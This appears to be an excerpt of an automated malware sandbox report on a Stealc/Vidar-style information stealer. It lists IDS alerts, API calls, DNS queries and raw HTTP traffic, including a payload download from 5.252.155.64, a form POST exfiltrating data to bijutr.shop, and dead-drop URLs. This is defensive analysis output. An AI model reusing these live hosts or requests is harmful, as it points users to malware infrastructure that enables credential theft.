Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 26_2_007673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,26_2_007673D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com, Code function: 26_2_0075D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,26_2_0075D921
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\

                    Networking

                    Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.6:49933 -> 188.245.216.205:443
                    Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.6:49927 -> 188.245.216.205:443
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.6:49939
                    Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.6:49945
                    Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Dec 2024 06:09:31 GMTServer: Apache/2.4.58 (Ubuntu)Last-Modified: Fri, 27 Dec 2024 04:44:48 GMTETag: "136ffc-62a391f62da6d"Accept-Ranges: bytesContent-Length: 1273852Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-program
                    Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /lem.exe HTTP/1.1Host: 5.252.155.64Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                    Source: Joe Sandbox ViewIP Address: 18.165.220.66 18.165.220.66
                    Source: Joe Sandbox ViewASN Name: WORLDSTREAMNL WORLDSTREAMNL
                    Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49773 -> 5.252.155.64:80
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                    Source: unknownTCP traffic detected without corresponding DNS query: 20.198.118.190
                    Source: unknownTCP traffic detected without corresponding DNS query: 5.252.155.64
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0076D889 InternetReadFile,SetEvent,GetLastError,SetEvent,26_2_0076D889
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239400728442_1ZZPG5YB8L69HFW32&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239400728441_1SJIWICR800Z51YH3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239402414229_1P4RDVHBQE93FAZFW&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239402414228_1EUMX2S6TUEXTBXLL&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381795017_1P2HE79XS2FOA94E1&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381795018_1H6ENBKGWI9ZKTUAB&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360172384_1T8ZHTG4V2CH7K983&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360172398_1SAKF1TLLO2IFUJXJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381876013_1OYVEM6EQRGLI15B8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239381876014_1KDTTK12P9PNFN49Z&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360433145_1P8I9JAN4TGEHJX5M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /th?id=OADD2.10239360433144_1RLNQD8OFQA9LQ1KZ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: tse1.mm.bing.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                    Source: chrome.exe, 00000020.00000003.3176818731.00005B38031A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3176736724.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3177071035.00005B38025B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory:
                    Source: global trafficDNS traffic detected: DNS query: sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJ
                    Source: global trafficDNS traffic detected: DNS query: t.me
                    Source: global trafficDNS traffic detected: DNS query: bijutr.shop
                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                    Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                    Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                    Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                    Source: global trafficDNS traffic detected: DNS query: c.msn.com
                    Source: global trafficDNS traffic detected: DNS query: api.msn.com
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----UAI5XB1VS0ZUAIEK6PHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                    Source: powershell.exe, 00000009.00000002.2403561813.0000025480182000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.252.
                    Source: tasklist.exe, 00000011.00000002.2545055640.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2544304213.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2544455277.00000000031EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.252.155.
                    Source: powershell.exe, 00000009.00000002.2406464503.0000025482DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.252.155.64
                    Source: putt.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: putt.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmp, putt.exe.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                    Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                    Source: qmgr.db.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                    Source: chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                    Source: chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                    Source: putt.exe, 0000000E.00000000.2503082127.0000000000409000.00000002.00000001.01000000.00000009.sdmp, putt.exe, 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmp, putt.exe.9.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: powershell.exe, 00000003.00000002.2227793598.0000012290071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.0000025483B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2480705766.0000025492344000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2480705766.000002549220E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmp, putt.exe.9.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: putt.exe.9.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: putt.exe.9.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: putt.exe.9.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254823C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: chrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                    Source: chrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                    Source: chrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                    Source: chrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                    Source: powershell.exe, 00000003.00000002.2199268665.0000012280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000003.00000002.2199268665.0000012280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.0000025482191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.2199268665.0000012280228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: Subtle.22.dr, Inf.com.15.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254823C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: Inf.com, 0000001A.00000000.2572957359.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp, Silicon.22.dr, Inf.com.15.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                    Source: powershell.exe, 00000009.00000002.2406464503.00000254837A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmp, putt.exe.9.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, 37Q1NG.26.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                    Source: chrome.exe, 00000020.00000003.3199694732.00005B3802494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                    Source: powershell.exe, 00000003.00000002.2199268665.0000012280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.0000025482191000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                    Source: chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
